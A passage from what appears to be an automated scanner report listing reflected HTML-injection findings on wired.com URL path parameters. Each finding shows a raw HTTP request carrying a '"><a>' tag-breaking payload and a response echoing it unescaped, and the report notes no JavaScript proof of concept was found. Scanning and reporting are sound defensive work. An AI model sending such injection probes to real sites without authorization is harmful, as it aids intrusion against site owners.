Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:10 GMT
Date: Sun, 21 Nov 2010 23:10:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science6e52a"><a>266a89d6056 ss_discoveries c_news">
...[SNIP]...

1.630. http://www.wired.com/science/discoveries/news/2007/02/72573 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72573

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33c3b"><a>4f568f221b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries33c3b"><a>4f568f221b1/news/2007/02/72573 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:36 GMT
Date: Sun, 21 Nov 2010 23:10:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries33c3b"><a>4f568f221b1 c_news">
...[SNIP]...

1.631. http://www.wired.com/science/discoveries/news/2007/02/72573 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72573

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ce8"><a>7d46a6a8f6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsb4ce8"><a>7d46a6a8f6b/2007/02/72573 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:47 GMT
Date: Sun, 21 Nov 2010 23:10:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsb4ce8"><a>7d46a6a8f6b">
...[SNIP]...

1.632. http://www.wired.com/science/discoveries/news/2007/02/72649 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72649

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2186"><a>2b24d914e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencef2186"><a>2b24d914e5/discoveries/news/2007/02/72649 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:09 GMT
Date: Sun, 21 Nov 2010 23:10:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencef2186"><a>2b24d914e5 ss_discoveries c_news">
...[SNIP]...

1.633. http://www.wired.com/science/discoveries/news/2007/02/72649 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72649

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be0f"><a>71f4beaefd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries7be0f"><a>71f4beaefd6/news/2007/02/72649 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:36 GMT
Date: Sun, 21 Nov 2010 23:10:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries7be0f"><a>71f4beaefd6 c_news">
...[SNIP]...

1.634. http://www.wired.com/science/discoveries/news/2007/02/72649 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72649

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 423ae"><a>3fe3a67e3bd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news423ae"><a>3fe3a67e3bd/2007/02/72649 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:47 GMT
Date: Sun, 21 Nov 2010 23:10:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news423ae"><a>3fe3a67e3bd">
...[SNIP]...

1.635. http://www.wired.com/science/discoveries/news/2007/03/72723 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72723

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9720"><a>e9f4d710ca3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceb9720"><a>e9f4d710ca3/discoveries/news/2007/03/72723 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:57 GMT
Date: Sun, 21 Nov 2010 23:10:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceb9720"><a>e9f4d710ca3 ss_discoveries c_news">
...[SNIP]...

1.636. http://www.wired.com/science/discoveries/news/2007/03/72723 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72723

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee3a7"><a>2240bc5bf26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesee3a7"><a>2240bc5bf26/news/2007/03/72723 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:17 GMT
Date: Sun, 21 Nov 2010 23:11:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesee3a7"><a>2240bc5bf26 c_news">
...[SNIP]...

1.637. http://www.wired.com/science/discoveries/news/2007/03/72723 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72723

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e7bf"><a>a0ed15676db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news6e7bf"><a>a0ed15676db/2007/03/72723 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:29 GMT
Date: Sun, 21 Nov 2010 23:11:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news6e7bf"><a>a0ed15676db">
...[SNIP]...

1.638. http://www.wired.com/science/discoveries/news/2007/03/72805 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72805

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe9ae"><a>f527668027f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencefe9ae"><a>f527668027f/discoveries/news/2007/03/72805 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:56 GMT
Date: Sun, 21 Nov 2010 23:10:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencefe9ae"><a>f527668027f ss_discoveries c_news">
...[SNIP]...

1.639. http://www.wired.com/science/discoveries/news/2007/03/72805 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72805

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e162"><a>7810533295 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries7e162"><a>7810533295/news/2007/03/72805 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:13 GMT
Date: Sun, 21 Nov 2010 23:11:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries7e162"><a>7810533295 c_news">
...[SNIP]...

1.640. http://www.wired.com/science/discoveries/news/2007/03/72805 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72805

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8058d"><a>0c1616ffa46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news8058d"><a>0c1616ffa46/2007/03/72805 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:23 GMT
Date: Sun, 21 Nov 2010 23:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news8058d"><a>0c1616ffa46">
...[SNIP]...

1.641. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0408 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0408

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2776e"><a>2cf882d2876 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science2776e"><a>2cf882d2876/discoveries/news/2007/04/dayintech_0408 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:38 GMT
Date: Sun, 21 Nov 2010 23:09:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science2776e"><a>2cf882d2876 ss_discoveries c_news">
...[SNIP]...

1.642. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0408 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0408

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94cdc"><a>0cc65881279 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries94cdc"><a>0cc65881279/news/2007/04/dayintech_0408 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:07 GMT
Date: Sun, 21 Nov 2010 23:10:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries94cdc"><a>0cc65881279 c_news">
...[SNIP]...

1.643. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0408 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0408

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7dad"><a>bdaa03d0efd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsb7dad"><a>bdaa03d0efd/2007/04/dayintech_0408 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:27 GMT
Date: Sun, 21 Nov 2010 23:10:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsb7dad"><a>bdaa03d0efd">
...[SNIP]...

1.644. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0411 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0411

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d4a"><a>db634723549 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science45d4a"><a>db634723549/discoveries/news/2007/04/dayintech_0411 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:05 GMT
Date: Sun, 21 Nov 2010 23:10:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science45d4a"><a>db634723549 ss_discoveries c_news">
...[SNIP]...

1.645. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0411 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/04/dayintech_0411

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52754"><a>779fdc29594 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries52754"><a>779fdc29594/news/2007/04/dayintech_0411 HTTP/1.1
Host: www.wired.com
Accept: */*
